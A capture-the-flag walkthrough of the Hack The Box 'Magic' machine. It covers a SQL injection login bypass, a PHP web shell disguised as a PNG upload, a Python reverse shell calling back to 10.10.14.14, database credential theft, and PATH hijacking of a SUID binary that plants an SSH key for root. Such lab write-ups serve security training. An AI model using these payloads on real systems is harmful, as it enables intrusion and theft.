Hack The Box - Magic
Enumeration
- Only two ports are open:
nmap -A -T5 -Pn -oN initial-nmap-scan 10.10.10.185
# Nmap 7.80 scan initiated Sat Apr 18 22:30:30 2020 as: nmap -A -T5 -Pn -oN initial-nmap-scan 10.10.10.185
Warning: 10.10.10.185 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.185
Host is up (0.048s latency).
Not shown: 971 closed ports, 27 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 18 22:30:44 2020 -- 1 IP address (1 host up) scanned in 14.23 seconds
-
Page at http://10.10.10.185 shows some images catalog. It also mentioned that you need to login to upload the images.
-
Images are located in a static folder like http://10.10.10.185/images/uploads/*.jpeg
-
Scanned the box with
gobuster
and discovered few other pages:
gobuster dir -u http://10.10.10.185/ -x php -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 200 -o initial-gobuster-scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.185/
[+] Threads: 200
[+] Wordlist: /usr/share/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/09/06 12:14:25 Starting gobuster
===============================================================
/images (Status: 301)
/assets (Status: 301)
/upload.php (Status: 302)
/logout.php (Status: 302)
/login.php (Status: 200)
/index.php (Status: 200)
/server-status (Status: 403)
Foothold
- Back to http://10.10.10.185/login.php and try SQLi:
username: ' or 1=1; -- -
password: ' or 1=1; -- -
-
And we got in! Page redirected to http://10.10.10.185/upload.php. But trying to upload any web shell failed with alert: “Sorry, only JPG, JPEG & PNG files are allowed.”
-
We need to confort this. Get PHP shell from https://github.com/jgor/php-jpeg-shell/raw/master/shell.php, rename it to
shell.php.png
and upload completes without any complains. Nice! -
From main page review we know upload folder location: http://10.10.10.185/images/uploads/. Try to open http://10.10.10.185/images/uploads/shell.php.png and it shows command input ready to execute.
-
Start a listener:
nc -lnvp 4444
- Execute reverse shell from WEB PHP shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- And we got a shell!
www-data@ubuntu:~/Magic/images/uploads$ ls -la
ls -la
total 7400
drwxr-xr-x 2 www-data www-data 4096 Apr 18 12:40 .
drwxr-xr-x 4 www-data www-data 4096 Apr 14 05:04 ..
-rw-r--r-- 1 www-data www-data 5289209 Oct 22 00:44 7.jpg
-rw-r--r-- 1 www-data www-data 1455770 Oct 22 01:02 giphy.gif
-rw-r--r-- 1 www-data www-data 25290 Apr 18 12:07 kibers.png
-rw-r--r-- 1 www-data www-data 124278 Oct 22 01:01 logo.png
-rw-r--r-- 1 www-data www-data 100328 Oct 22 01:01 magic-1424x900.jpg
-rw-r--r-- 1 www-data www-data 37787 Oct 22 01:01 magic-hat_23-2147512156.jpg
-rw-r--r-- 1 www-data www-data 71417 Apr 18 12:39 magic-stwand.jpg
-rw-r--r-- 1 www-data www-data 67973 Oct 22 01:01 magic-wand.jpg
-rw-r--r-- 1 www-data www-data 8 Apr 18 12:30 r.png
-rw-r--r-- 1 www-data www-data 192 Apr 18 12:40 shell.php.png
-rw-r--r-- 1 www-data www-data 192 Apr 18 12:23 shell.png
-rw-r--r-- 1 root root 361568 Apr 14 04:56 trx.jpg
www-data@ubuntu:~/Magic/images/uploads$
Getting user
- From
/var/www/Magic/db.php5
file we got MySQL credentials:
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
- Using these credentials it’s possible to create MySQL dump:
mysqldump --databases Magic -u theseus -p iamkingtheseus > magic.sql
- From SQL-dump we got admin credentials:
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
- Trying to reuse this password for user:
www-data@ubuntu:/dev/shm$ su theseus
su theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:~$ cat user.txt
cat user.txt
b0fdfe563dc8c153cebf91eab51166c2
theseus@ubuntu:~$ pwd
pwd
/home/theseus
theseus@ubuntu:~$ ls -la
ls -la
total 84
drwxr-xr-x 15 theseus theseus 4096 Apr 16 02:58 .
drwxr-xr-x 3 root root 4096 Oct 15 2019 ..
lrwxrwxrwx 1 theseus theseus 9 Oct 21 03:26 .bash_history -> /dev/null
-rw-r--r-- 1 theseus theseus 220 Oct 15 2019 .bash_logout
-rw-r--r-- 1 theseus theseus 15 Oct 21 03:25 .bash_profile
-rw-r--r-- 1 theseus theseus 3771 Oct 15 2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Mar 13 05:57 .cache
drwx------ 13 theseus theseus 4096 Oct 22 03:30 .config
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Desktop
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Documents
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Downloads
drwx------ 3 theseus theseus 4096 Oct 21 03:49 .gnupg
-rw------- 1 theseus theseus 7334 Apr 15 23:50 .ICEauthority
drwx------ 3 theseus theseus 4096 Oct 21 03:49 .local
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Music
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Pictures
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Public
drwx------ 2 theseus theseus 4096 Oct 21 07:31 .ssh
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Templates
-r-------- 1 theseus theseus 33 Apr 18 03:59 user.txt
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Videos
Privilege escalation
- We have non-default SUID-file:
theseus@ubuntu:~$ ls -la /bin/sysinfo
-rwsr-x--- 1 root users 22040 Oct 21 03:45 /bin/sysinfo
- And we are in a right group to run it:
theseus@ubuntu:~$ id theseus
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
- Running it with
ltrace
revealed thatfree
command runs without full path and so we can try to control the execution:
- Create custom file:
theseus@ubuntu:/dev/shm$ cat free
#!/bin/sh
cat /root/root.txt
mkdir /root/.ssh
cat /home/theseus/.ssh/authorized_keys >> /root/.ssh/authorized_keys
- Make it executable:
theseus@ubuntu:/dev/shm$ chmod +x free
- Adjust PATH variable:
theseus@ubuntu:~$ export PATH=/dev/shm:$PATH
-
Running
sysinfo
prints root’s hash and also copies our SSH key to root’s location. -
SSH in as root:
ssh -i id_rsa.pub root@10.10.10.185
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
29 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Sat Apr 18 14:47:23 2020 from 10.10.14.14
root@ubuntu:~# cat root.txt
392e6cbdbbb527970f14098612325fe7
root@ubuntu:~#